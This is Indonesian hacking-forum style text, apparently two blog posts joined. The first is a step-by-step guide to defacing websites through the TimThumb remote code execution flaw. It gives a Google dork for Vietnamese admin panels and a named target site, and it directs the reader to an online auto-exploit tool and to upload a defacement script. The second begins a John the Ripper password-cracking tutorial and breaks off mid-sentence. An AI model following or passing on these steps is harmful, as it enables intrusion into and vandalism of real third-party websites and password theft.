Deface timthumb rce Bahan Dork: "administractor" site:vn inurl:/admin Langkahnya gaynn Silahkan dorking doloo di gugel/crome dan sebagainya Lalu silahkan pilih webnya gaynn Q skarang udah nemu webnya [http://usaplastic.vn/admin] Silahkan mas mas tambahin dibelakang admin dengan tulisan [timthumb.php] Contoh: http://usaplastic.vn/admin/timthumb.php Nah disutu ada tulisan tulisan kalian baca aja,, kalo ada tulisan TimThumb version : 1.19 berarti itu bisa gaynn (q belom nemu yang dibawah 1.19 dan diatas 1.19) Lalu kalianke web auto exploit nya gayn klik ini gayn [http://atisdale.org/tools/timthumb.php] Lalu kalian isi dengan link target nya gayn Dan kalian klik execute Kan disitu ada tulisan /home/usaplastic/domains/usaplastic.vn/public_html/admin/webroot/./cache/ab34505c0e0211566e95d4be3a23f0b3.php Kalian salin yang bagian admin sampe php trus tempel di link target contoh http://usaplastic.vn/admin/timthumb.php Menjadi http://usaplastic.vn/admin/webroot/./cache/ab34505c0e0211566e95d4be3a23f0b3.php Dan buumm,,kalian upload sc depes andalan kalian Saya Fan_ sekian trimakasih
Cara menggunakan John the ripper
John the Ripper adalah suatu program yang lumayan terkenal di dunia hacking. JTR biasa digunakan untuk meng-Crack suatu password. INSTALASI JOHN THE RIPPER – Download John the Ripper 1.7.0.1 (Windows – binaries, ZIP, 1360 KB) klik DISINI Beberapa tips yg akan mempermudah saat menginstal John the Ripper pada windows 1. Simpan di C:/ , jangan di program files maupun folder apapun. 2. Ketika menginstal mungkin akan terlihat seperti C: / John/john1701 / dll Pindahkan semuanya keluar dari folder john1701 dan masuk ke folder pertama. Kemudian hapus john1701. 3. Sekarang ketika Anda masuk ke drive C anda dan membuka folder john, Anda akan melihat kedua folder doc untuk menjalankan, bukan john1701 4. Dalam run folder Anda akan melihat aplikasi “john-386″ atau “john-sesuatu”. Hanya ganti nama ke “john” Untuk menjalankan JTP, kita membukanya melalui garis perintah ms-dos Go Start, run, dan ketik cmd ketikkan perintah ini: cd C: / john / run BEBRAPA JENIS ATTACK MELALUI JTP. -Bruteforce At